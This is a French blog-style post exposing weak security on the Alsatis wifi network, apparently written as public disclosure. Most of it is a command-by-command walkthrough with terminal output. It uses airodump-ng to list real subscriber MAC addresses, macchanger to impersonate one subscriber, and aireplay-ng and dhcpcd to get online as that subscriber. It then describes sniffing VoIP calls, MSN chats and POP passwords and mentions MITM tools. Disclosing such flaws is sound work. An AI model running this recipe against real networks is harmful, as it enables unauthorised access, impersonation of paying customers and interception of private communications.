«Petit Problème» de sécurité sur le réseau Wifi Alsatis... Matériel utilisé : adaptateur usb wifi alfa awus036h Logiciel utilisé : système d exploitation Linux distribution Backtrack et Wireshark. Une présentation de la société Alsatis est présente sur : http://www.alsatis.com/alsatis.php En résumé, Alsatis représente un total de 6000 abonnés sur 500 communes... Toutes les démonstrations suivantes sont connues de tous les amateurs éclairés bidouillants avec la technologie Wifi. Il ne faut pas se méprendre, je ne fais pas partie du monde des Hackers, ou autre génie de l informatique : je cherche simplement à comprendre le «pourquoi du comment» de certaines choses... Le système d exploitation utilisé est Linux avec Backtrack comme distribution puisqu il contient déjà beaucoup d utilitaires conçus pour l analyse réseau. Toute la démonstration est tout à fait adaptable sous Windows puisque la plupart des logiciels utilisés ont leurs équivalence. L adaptateur wifi alfa awus036h sera donc reconnu en «wlan0» Mettons la carte wifi en mode «monitor» pour écouter l état du réseau Alsatis : bt ~ # iwconfig lo no wireless extensions. eth0 no wireless extensions. wlan0 802.11b/g Mode:Managed Channel=11 Access Point: Not-Associated Bit Rate=11 Mb/s Tx-Power=5 dbm Retry:on Fragment thr:off Encryption key:off Link Quality=6/100 Signal level=-240 dbm Noise level=-162 dbm Rx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0 Tx excessive retries:0 Invalid misc:0 Missed beacon:0 bt ~ # airmon-ng start wlan0 Interface Chipset Driver wlan0 RTL8187 r8187 (monitor mode enabled) bt ~ # iwconfig lo no wireless extensions. eth0 no wireless extensions. wlan0 802.11b/g Mode:Monitor Channel=10 Bit Rate=11 Mb/s Tx-Power=5 dbm Retry:on Fragment thr:off Link Quality:6/100 Signal level:-240 dbm Noise level:-162 dbm Rx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0 Tx excessive retries:0 Invalid misc:0 Missed beacon:0 Lançons le logiciel d écoute du réseau «airodump». Le relais Alsatis fonctionne uniquement sur le canal Wifi n 01.
Nous pouvons observer que dans la colonne ENC (encryption), le sigle OPN indique que le réseau est en clair (OPEN) : autrement dit, il n y a pas de cryptage des données circulant sur le réseau Wifi Alsatis. C est une aberration puisque de nos jours même la connexion Wifi d un particulier entre sa Box (Freebox, Neufbox...) et son pc est cryptée par défaut (WEP, WPA...). bt ~ # airodump-ng wlan0 -c 01 CH 1 ][ Elapsed: 3 mins ][ 2010-04-06 20:28 BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH E 00:0C:42:05:91:FF 15 0 1303 2744 20 1 11. OPN a BSSID STATION PWR Rate Lost Packets Probe 00:0C:42:05:91:FF 00:16:01:AF:49:0B 66 11-11 12 1014 00:0C:42:05:91:FF 00:80:48:64:86:5E 41 11-1 0 32 alsatis 00:0C:42:05:91:FF 00:80:48:57:E0:7A 35 11-11 0 43 00:0C:42:05:91:FF 00:80:48:65:40:2A 26 11-11 0 12 alsatis 00:0C:42:05:91:FF 00:15:6D:EE:28:E3 16 11-1 0 13 alsatis 00:0C:42:05:91:FF 00:80:48:54:75:BC -1 11-0 0 11 00:0C:42:05:91:FF 00:80:48:55:91:22-1 11-0 0 9 00:0C:42:05:91:FF 00:80:48:57:E0:E4-1 11-0 0 16 00:0C:42:05:91:FF 00:16:01:AE:27:E7-1 11-0 0 5 00:0C:42:05:91:FF 00:16:01:AF:2A:31-1 11-0 0 46 00:0C:42:05:91:FF 00:80:48:54:74:6C -1 11-0 0 10 00:0C:42:05:91:FF 00:15:6D:EE:D3:6E -1 11-0 0 63 00:0C:42:05:91:FF 00:80:48:5E:F3:56-1 11-0 0 7 00:0C:42:05:91:FF 00:80:48:54:77:62-1 11-0 0 7 00:0C:42:05:91:FF 00:16:01:AD:B2:41-1 11-0 0 28 Comment le relais Wifi Alsatis 00:0C:42:05:91:FF peut il donc faire pour reconnaître les abonnés habilités à se connecter à Internet. Le réseau étant OPEN, la solution est le filtrage par adresse MAC. L adresse MAC est un identifiant mis en place physiquement par les constructeurs dans l électronique même des cartes réseaux, modem... Elle est donc en principe inchangeable (d ou l intérêt du filtrage des adresses MAC pour la connexion au réseau Alsatis). Le modem-routeur envoyé à chaque abonné par Alsatis placé sur le toit (pour établir la connexion Wifi) possède donc une adresse MAC d identification unique. Le problème est qu il existe des logiciels tel que «macchanger» pour changer virtuellement une adresse MAC... A partir de là, nous pouvons prendre virtuellement n importe quelle adresse MAC afin de leurrer le filtrage du réseau Alsatis pour se connecter à Internet. Ci dessous les commandes pour changer l adresse MAC de l adaptateur Wifi par l adresse Mac 00 :16 :01 :AF :2A :31 (repérer plus haut comme client Alsatis grâce au logiciel «airodump». bt ~ # ifconfig wlan0 down bt ~ # macchanger wlan0 -m 00:16:01:AF:2A:31 Current MAC: 00:c0:ca:23:ad:60 (Alfa, Inc.) Faked MAC: 00:16:01:AF:2A:31 (unknown) bt ~ # ifconfig wlan0 up bt ~ # iwconfig
lo eth0 no wireless extensions. no wireless extensions. wlan0 802.11b/g Mode:Monitor Channel=1 Bit Rate=11 Mb/s Tx-Power=5 dbm Retry:on Fragment thr:off Link Quality=93/100 Signal level=-212 dbm Noise level=-249 dbm Rx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0 Tx excessive retries:0 Invalid misc:0 Missed beacon:0 bt ~ # ifconfig lo Link encap:local Loopback inet addr:127.0.0.1 Mask:255.0.0.0 UP LOOPBACK RUNNING MTU:16436 Metric:1 RX packets:0 errors:0 dropped:0 overruns:0 frame:0 TX packets:0 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 RX bytes:0 (0.0 b) TX bytes:0 (0.0 b) wlan0 Link encap:unspec HWaddr 00-16-01-AF-2A-31-00-00-00-00-00-00-00-00-00-00 UP BROADCAST NOTRAILERS RUNNING PROMISC ALLMULTI MTU:1500 Metric:1 RX packets:3328 errors:5 dropped:0 overruns:0 frame:0 TX packets:0 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 RX bytes:352656 (344.3 KiB) TX bytes:0 (0.0 b) Nous allons ensuite utiliser le logiciel «Aireplay» afin de lancer une connexion au relais Alsatis 00:0c:42:05:91:ff avec notre nouvelle adresse MAC 00:16:01:AF:2A:31. bt ~ # aireplay-ng -1 5 -e alsatis -a 00:0c:42:05:91:ff -h 00:16:01:AF:2A:31 wlan0 21:51:31 Waiting for beacon frame (BSSID: 00:0C:42:05:91:FF) on channel 1 21:51:31 Sending Authentication Request (Open System) 21:51:33 Sending Authentication Request (Open System) 21:51:35 Sending Authentication Request (Open System) 21:51:37 Sending Authentication Request (Open System) 21:51:40 Sending Authentication Request (Open System) 21:51:43 Sending Authentication Request (Open System) 21:51:46 Sending Authentication Request (Open System) 21:51:48 Sending Authentication Request (Open System) 21:51:50 Sending Authentication Request (Open System) 21:51:52 Sending Authentication Request (Open System) 21:51:55 Sending Authentication Request (Open System) 21:51:55 Authentication successful 21:51:55 Sending Association Request 21:51:55 Association successful :-) (AID: 1) 21:52:00 Sending Authentication Request (Open System)
21:52:00 Authentication successful 21:52:00 Sending Association Request 21:52:00 Association successful :-) (AID: 1) 21:52:05 Sending Authentication Request (Open System) 21:52:07 Sending Authentication Request (Open System) 21:52:09 Sending Authentication Request (Open System) 21:52:09 Authentication successful 21:52:09 Sending Association Request 21:52:14 Sending Authentication Request (Open System) 21:52:14 Authentication successful 21:52:14 Sending Association Request 21:52:14 Association successful :-) (AID: 1) Nous sommes donc connectées au relais Alsatis. Passons l adaptateur Wifi en mode «Manager» pour établir une connexion Internet. bt ~ # iwconfig wlan0 mode manager bt ~ # iwconfig lo no wireless extensions. eth0 no wireless extensions. wlan0 802.11b/g Mode:Managed Channel=1 Access Point: Not-Associated Bit Rate=11 Mb/s Tx-Power=5 dbm Retry:on Fragment thr:off Encryption key:off Link Quality=0/100 Signal level=-238 dbm Noise level=-156 dbm Rx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0 Tx excessive retries:0 Invalid misc:0 Missed beacon:0 Lançons la configuration de la connexion à Internet. bt ~ # iwconfig wlan0 ap 00:0c:42:05:91:ff bt ~ # iwconfig wlan0 essid alsatis Lançons la connexion bt ~ # dhcpcd wlan0 Grâce au «ping» suivant, nous avons la confirmation que nous sommes connectées à Internet (Firefox fonctionne). Pour Alsatis, nous sommes l abonné 00:16:01:AF:2A:31 bt ~ # ping www.google.fr PING www.l.google.com (209.85.229.99) 56(84) bytes of data. 64 bytes from ww-in-f99.1e100.net (209.85.229.99): icmp_seq=3 ttl=49 time=314 ms --- www.l.google.com ping statistics --- 6 packets transmitted, 1 received, 83% packet loss, time 9600ms rtt min/avg/max/mdev = 314.701/314.701/314.701/0.000 ms Au delà de la gratuité, cette connexion «sauvage» pose le problème de l usurpation d identité sur un réseau Wifi, fâcheux en cas de téléchargement illégal (Hadopi), cybercrime, spam mailing... Comme vous le voyez, la manipulation est à la porter d un enfant!
Mais, il y a plus grave : Puisque le flux de données sur le réseau Alsatis n est pas cryptée, il peut être observer par un logiciel analyseur du flux réseau tel que «wireshark». Alsatis étant à la pointe de la technologie, la société propose à ses abonnés la possibilité de téléphoner gratuitement et de manière illimité en passant leurs communication par Internet grâce à un petit boîtier Linksys PAP2T (La société Keyyo semble être le prestataire de ce service de téléphonie ip). Les communications téléphoniques apparaissent alors sous forme de packet ayant comme protocole réseau SIP et RTP. Ci dessous après filtrage, ils apparaissent ainsi : Il va donc être possible grâce à la manipulation ci dessous d enregistrer la conversation téléphonique en clair...
Il est aussi possible d écouter directement la conversation téléphonique interceptée...
Dans le même registre, il est possible d intercepter les conversations de messagerie «Chat» de type MSN. Ci dessous la copie d écran après avoir filtrer le protocole MSNMS correspondant au dialogue sur MSN. Nous pouvons lire le texte envoyé, l expéditeur, le destinataire...
De même avec les mails : en filtrant le protocole «POP», il est possible d intercepter les mails relevés tout en capturant les mots de passe (PASS) et identifiants (USER) de la personne...
Au sujet des échanges sécurisés, il est à noter que le protocole TLSV1 (SSL) utilisé pour les sites sécurisés avec https est efficace. Par sniffing, aucune donnée n est lisible (n CB). Mais avec des méthodes plus sophistiquées (et si la cible accepte un faux certificats SSL) alors ce protocole devient obsolète.
Il faut préciser que l interception de données peut être automatiser par des logiciels tel que Mailsnarf, Urlsnarf, Dsniff et Ettercap. Ces interceptions sont d autant plus menaçantes que des services de l Etat tel que des mairies, des collectivités territoriales, des gendarmeries utilisent le réseau Alsatis. Une grande partie de l identification sur Internet est basée sur un ensemble «mot de passe/identifiant». Si vous oubliez votre mot de passe pour vous connecter à votre compte (banque, messagerie, forum, site e-commerce), votre nouveau mot de passe vous est très souvent renvoyé par mail... Vous comprendrez donc que ces interceptions sont dangereuses! De plus, ce défaut de sécurité permet aussi de rendre une attaque de type «man in the middle» MITM avec injection de fausses données et redirection de l ensemble du flux Internet de manière non visible pour les utilisateurs très efficaces... Ce sera peut être l objet d une autre démonstration? ;@) Margaux de la Valière